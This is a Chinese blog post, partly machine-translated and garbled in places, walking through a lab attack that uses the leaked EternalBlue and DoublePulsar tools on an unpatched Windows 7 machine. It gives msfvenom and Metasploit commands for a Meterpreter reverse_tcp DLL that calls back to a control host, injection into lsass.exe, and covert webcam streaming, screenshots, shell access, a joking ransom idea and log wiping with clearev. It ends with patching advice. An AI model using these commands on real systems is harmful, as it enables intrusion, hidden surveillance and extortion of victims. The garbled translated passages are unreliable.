我久违地用了这个日志。 最近,WannaCry横行,媒体进行了铺天盖地的报道。 我后来研究并想起了WannaCry利用的这个原产于美帝的国家安全局发现的漏洞。 找到漏洞的话请不要说。 很好。 你可以自己偷偷用。 但是,不能泄露哦。 我们要感谢伟大的组织Shadow Brokers (阴影之秋)的酷名。 有木有很文艺的感觉。 感谢他让我们的小屁民也使用了国安局的道具。 o ) ) _) o是哈哈,),2016年8月Shadow Brokers入侵了方程组织) equationgrokers。 此外,Shadow Brokers还保留了部分文件,打算通过公开拍卖的形式出售给最高价格的竞买者,预计价格为100万比特币(价值近5亿美元)。 Shadow Brokers的工具一直卖不出去.......................... 其实,人的工具包有特殊的牛攻击负荷,但那是因为道路不正确,不敢使用,只有工具包里的EternalBlue,又是Doublepulsa。 名为EternalBlue的工具利用windows系统中Windows SMB远程执行代码的漏洞将路由到Microsoft服务器消息块(SMBv1 )服务器,不使用现成的攻击载荷,在MSF中生成攻击载荷
需要三台电脑
正版windows7SP1 (未更新为最新修补程序),ip:192.168.1.179,无需执行任何操作。 打开电源,知道IP就行了
这是我在wqdhmgsjx的笔记本。 (花了7年) ) )。
用于执行攻击程序并注入dll的一台。 EternalBlue需要python2.6. 6,32位和py win32-221,32位版本,所以攻击的电脑需要32位。 我正在使用windowsXP ip地址192.168.1.180
我还需要一台电脑。 这是用于控制被入侵的电脑、linux系统的控制端。 这还有使用msf生成攻击负荷的功能。 msf是什么是不言而喻的。 攻击入侵,是杀人越品的必须良品。
首先,利用msfvenom生成木马的负载。 协助工作的人在64位计算机上运行特洛伊木马,因此生成特洛伊木马的命令如下。
MSF venom-p windows/x64/meter preter/reverse _ tcpl host=192.168.1.41 lport=5555-fdll/root/dll/system set
三个位置之一是控制端地址,一个是要使用的端口,另一个是生成文件的存储位置。 接下来是模块。 适用于64位windows
生成后,将dll文件复制到攻击用电脑后,利用EternalBlue攻击受害系统,成功后,利用Doublepulsa将刚生成的木马远程、在人不知情的情况下,鬼不觉地注入受害系统。
然后在msf上打开msfpaylod进行监听,等待被控方在线。
$ msfconsole,打开msfconsole,看看这个帅不帅
接下来,设定听力
msf useexploit/multi/handler
msf set LHOST 192.168.1.41
msf set LPORT 5555
msfsetpayloadwindows/x64/meter preter/reverse _ TCP
MSF输出
等wqdhmgsjx上钩吧
接下来是重头戏。 将NSA的超级牛工具复制到安装了环境的攻击者上,然后运行windows目录中的fb.py。 修改源文件并注释掉26、27、28和72这四行。
需要设置的有 攻击IP地址192.168.1.179(受害者),回调地址192.168.1.180(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他都是默认值回车即可。
接下来输入命令开启永恒之蓝开始攻击:
use ETERNALBLUE
依次填入相关参数,超时时间等默认参数可以直接回车,需要注意的就是,选择被攻击方的操作系统 目标系统信息,以及攻击模式选择FB
看到 这个 Et ernalblue Succeeded,攻击完成
接下来开始使用 Doublepulsar,把刚刚生成的木马注入到受害系统中去
use Doublepulsar
一路回车,需要注意的就是选择目标操作系统架构,系统后门的执行方式选择Rundll
填写刚刚生成的那个木马dll文件的地址
这个是填写你要注入的进程,默认是lsass.exe 默认就是最好的,直接回车
看到这个吗?Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束
返回到控制机,看看wqdhmgsjx已经上线了
再看看wqdhmgsjx,还是浑然不觉,很正常的在运行。
接下来,先用sysinfo看看wqdhmgsjx的信息,使用webcam_list 看看被控制的电脑有没有摄像头,routes查看路由表
这个screenshot,就是截取被控制端电脑的屏幕看看
这个就是截取到的图片
这个是打开被控制端的摄像头,拍一张图片
这个就是摄像头拍到的图片
下面这个就是开启摄像头直播,把摄像头拍摄的数据流传送回来,直接直播,哈哈哈
这个就是直播呢
shell,获取被控制系统的shell,就是像在你电脑上运行cmd一样,啥命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了,哈哈,完了留个消息,给钱给密码,不给钱,你也打不开文件,哈哈 想哭 就是这么干的……
dir下被控制端的c盘有哪些文件
能做到很多呢,上传,下载文件,执行文件 等等等 没有做不到,只有想不到…… msf是不是很牛。
玩完了,记得清理掉痕迹,清理被控制端的日志
clearev
这个是不是很恐怖,所以,安全很重要,系统要用正版的,倒不至于去买正版,但是最起码要安装原版,完了各种办法去激活想正式版一样的享受升级,补丁……,万万不可用各种系统ghost,确实很快,很快,但是也很危险 很危险,想想这个远程控制你需要漏洞,需要好的攻击工具,很麻烦,如果把木马提前放到ghost映像里面,你安装直接就在系统了,直接控制根本不需要什么攻击和漏洞,看看这次大规模爆发,校园首当其冲,再有就是网络比较大的单位,一是他们是局域网,正中,还有一个原因就是他们的操作系统多数都是30块在大街上ghost的,或者小铺ghost的,微软早在3月14日就发布了ms17-010漏洞的补丁, ETERNALBLUE是在4月14日才释放出来,要不是wannacry大规模爆发,根本不会关注这个漏洞,不会去下载补丁。